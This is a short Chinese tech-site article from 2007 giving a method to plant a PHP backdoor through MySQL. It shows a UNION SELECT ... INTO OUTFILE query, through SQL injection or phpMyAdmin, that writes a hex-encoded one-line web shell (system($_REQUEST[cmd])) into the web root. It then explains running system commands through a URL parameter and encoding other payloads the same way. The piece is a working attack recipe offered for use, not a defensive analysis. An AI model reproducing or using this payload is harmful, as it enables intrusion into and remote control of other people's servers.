赛迪网 > IT技术 数据库 > 精彩更新
  IT资讯搜索
 
IT产品搜索

运用Mysql语句生成后门木马的具体方法

发布时间:2007.07.27 04:46     来源:赛迪网    作者:hk

通过Mysql 的语句生成后门木马的方法:

SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

答:就是下图代码中的十六进制编码,

<?php system($_REQUEST[cmd]);?>

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了! (责任编辑:卢兆林)


[ 发表评论 ] 字体[  ] [ 打印 ] [ 进入博客 ] [ 进入论坛 ]  [ 推荐给朋友 ]
  相关文章
· 学会如何巧妙从进程中判断出病毒和木马 (07-25) · 网络安全知识:常见病毒木马进程速查表 (07-25)
· “代理下载器”下载盗号病毒和恶意程序 (07-25) · 黑客经验谈:关于一句话木马的更新思想 (07-24)
· 警惕每一个网页小心“下载者”变种侵袭 (07-24) · 11种盗号木马同发作 德夫下载器成毒源 (07-23)
· “小木马”通过自动运行传播占用系统资源 (07-23) · 管理本机特殊端口防范木马程序的攻击方法 (07-22)
· “慕斯下载器”下载大量流氓软件与病毒 (07-20) · 快关闭系统自动运行 防止VB蠕虫的传播 (07-19)
  客户需求反馈表
* 姓  名:
更多资料  了解方案  认识厂商
* 单位名称:
* 联系电话:
* 电子邮件:
  赛迪推荐  
  手机·资费 ·新品·导购·评测·手机资费·宽带
手机搜索  诺基亚 N73 MOTO Z6
  IT产品 ·笔记本·台式机·服务器·打印·投影
IT产品搜索 
  IT技术 ·开发·网管·安全·数据库·操作系统
  博客·论坛 ·曾剑秋·项立刚·Java学习·网管